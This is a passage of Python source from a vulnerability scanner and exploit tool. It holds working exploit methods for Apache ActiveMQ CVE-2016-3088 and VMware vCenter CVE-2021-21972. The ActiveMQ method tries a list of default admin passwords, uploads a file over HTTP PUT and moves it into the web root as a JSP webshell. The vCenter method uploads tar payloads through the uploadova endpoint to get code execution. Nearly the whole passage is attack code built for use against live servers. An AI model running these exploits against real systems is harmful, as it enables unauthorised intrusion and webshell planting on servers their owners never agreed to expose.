self.vul_info["vul_payd"] = url self.vul_info[ "prt_info"] = "[file] [os:windows] [url:" + url + " ]" verify.scan_print(self.vul_info) except requests.exceptions.Timeout: verify.timeout_print(self.vul_info["prt_name"]) except requests.exceptions.ConnectionError: verify.connection_print(self.vul_info["prt_name"]) except Exception as error: verify.error_print(self.vul_info["prt_name"]) self.threadLock.release()
def cve_2016_3088_poc(self): self.threadLock.acquire() self.vul_info["prt_name"] = "Apache AcitveMQ: CVE-2016-3088" self.vul_info["prt_resu"] = "null" self.vul_info["prt_info"] = "null" self.vul_info["vul_urls"] = self.url self.vul_info["vul_payd"] = "null" self.vul_info["vul_name"] = "Apache ActiveMQ 远程代码执行漏洞" self.vul_info["vul_numb"] = "CVE-2016-3088" self.vul_info["vul_apps"] = "AcitveMQ" self.vul_info["vul_date"] = "2016-03-10" self.vul_info["vul_vers"] = "< 5.14.0" self.vul_info["vul_risk"] = "high" self.vul_info["vul_type"] = "远程代码执行漏洞" self.vul_info["vul_data"] = "null" self.vul_info[ "vul_desc"] = "ActiveMQ 中的 FileServer 服务允许用户通过 HTTP PUT 方法上传文件到指定目录" self.vul_info["cre_date"] = "2021-01-07" self.vul_info["cre_auth"] = "zhzyker" self.rawdata = None self.path = "null" self.name = random_md5()[:-20] self.webshell = "/" + self.name + ".jsp" self.poc = random_md5() self.exp = self.jsp_webshell self.passlist = [ "admin:123456", "admin:admin", "admin:123123", "admin:activemq", "admin:12345678" ] try: try: for self.pa in self.passlist: self.base64_p = base64.b64encode(str.encode(self.pa)) self.p = self.base64_p.decode('utf-8') self.headers_base64 = { 'User-Agent': self.ua, 'Authorization': 'Basic ' + self.p } url = urljoin(self.url, "/admin/test/systemProperties.jsp") self.request = requests.get(url, headers=self.headers_base64, timeout=self.timeout, verify=False) if self.request.status_code == 200: self.path = \ re.findall('<td class="label">activemq.home</td>.*?<td>(.*?)</td>', self.request.text, re.S)[0] break except IndexError: pass self.request = requests.put(self.url + "/fileserver/v.txt", headers=self.headers_base64, data=self.poc, timeout=self.timeout, verify=False) self.headers_move = { 'User-Agent': self.ua, 'Destination': 'file://' + self.path + '/webapps/api' + self.webshell } self.request = requests.request("MOVE", self.url + "/fileserver/v.txt", headers=self.headers_move, timeout=self.timeout, verify=False) self.request = requests.get(self.url + "/api" + self.webshell, headers=self.headers_base64, timeout=self.timeout, verify=False) if self.poc in self.request.text: self.vul_info["vul_data"] = dump.dump_all(self.request).decode( 'utf-8', 'ignore') self.vul_info["prt_resu"] = "PoCSuCCeSS" self.vul_info[ "vul_payd"] = 'file://' + self.path + '/webapps/api' + self.webshell self.vul_info[ "prt_info"] = "[upload: " + self.url + "/api" + self.webshell + " ] [" + self.pa + "]" verify.scan_print(self.vul_info) else: verify.scan_print(self.vul_info) except requests.exceptions.Timeout: verify.timeout_print(self.vul_info["prt_name"]) except requests.exceptions.ConnectionError: verify.connection_print(self.vul_info["prt_name"]) except Exception as e: verify.error_print(self.vul_info["prt_name"]) self.threadLock.release()
def cve_2021_21972_poc(self): self.threadLock.acquire() self.vul_info["prt_name"] = "Vmware vCenter: CVE-2021-21972" self.vul_info["prt_resu"] = "null" self.vul_info["prt_info"] = "null" self.vul_info["vul_urls"] = self.url self.vul_info["vul_payd"] = "null" self.vul_info["vul_name"] = "Vmware vCenter 任意文件上传" self.vul_info["vul_numb"] = "CVE-2021-21972" self.vul_info["vul_apps"] = "Vmware" self.vul_info["vul_date"] = "2021-02-24" self.vul_info[ "vul_vers"] = "7.0 < 7.0 U1c, 6.7 < 6.7 U3l, 6.5 < 6.5 U3n" self.vul_info["vul_risk"] = "high" self.vul_info["vul_type"] = "任意文件上传" self.vul_info["vul_data"] = "null" self.vul_info["vul_desc"] = "未经授权的文件上传会导致远程执行代码(RCE)(CVE-2021-21972)" self.vul_info["cre_date"] = "2021-02-25" self.vul_info["cre_auth"] = "zhzyker" headers = { "User-agent": self.ua, "Connection": "close", "Content-Type": "application/x-www-form-urlencoded" } try: url = urljoin(self.url, "/ui/vropspluginui/rest/services/uploadova") res = requests.get(url, headers=headers, timeout=self.timeout, verify=False) if res.status_code == 405: self.vul_info["vul_data"] = dump.dump_all(res).decode( 'utf-8', 'ignore') self.vul_info["prt_resu"] = "PoC_MaYbE" self.vul_info["vul_payd"] = url self.vul_info["prt_info"] = "[upload] [url:" + url + " ]" headers = { "User-Agent": self.ua, "Accept": "*/*", "Connection": "close" } path = os.path.split(os.path.realpath(sys.argv[0]))[0] linux_tar = path + "/payload/payload/cve202121972_linux.tar" file = {'uploadFile': open(linux_tar, 'rb')} url = urljoin(self.url, "/ui/vropspluginui/rest/services/uploadova") r = requests.post(url, files=file, headers=headers, timeout=self.timeout, verify=False) url = requests.compat.urljoin(self.url, "/ui/resources/vvvvvv.txt") req = requests.get(url, headers=headers, timeout=self.timeout, verify=False) if r"upload" in req.text: self.vul_info["vul_data"] = dump.dump_all(r).decode( 'utf-8', 'ignore') self.vul_info["prt_resu"] = "PoCSuCCeSS" self.vul_info["vul_payd"] = linux_tar self.vul_info[ "prt_info"] = "[upload] [os:linux] [url:" + url + " ]" else: windows_tar = path + "/payload/payload/cve202121972_windows.tar" file = {'uploadFile': open(windows_tar, 'rb')} url = requests.compat.urljoin( self.url, "/ui/vropspluginui/rest/services/uploadova") r = requests.post(url, files=file, headers=headers, timeout=self.timeout, verify=False) url = requests.compat.urljoin(self.url, "/ui/resources/vvvvvv.txt") req = requests.get(url, headers=headers, timeout=self.timeout, verify=False) if r"upload" in req.text: self.vul_info["vul_data"] = dump.dump_all(r).decode( 'utf-8', 'ignore') self.vul_info["prt_resu"] = "PoCSuCCeSS" self.vul_info["vul_payd"] = windows_tar self.vul_info[ "prt_info"] = "[upload] [os:windows] [url:" + url + " ]" verify.scan_print(self.vul_info) except requests.exceptions.Timeout: verify.timeout_print(self.vul_info["prt_name"]) except requests.exceptions.ConnectionError: verify.connection_print(self.vul_info["prt_name"]) except Exception as error: verify.error_print(self.vul_info["prt_name"]) self.threadLock.release()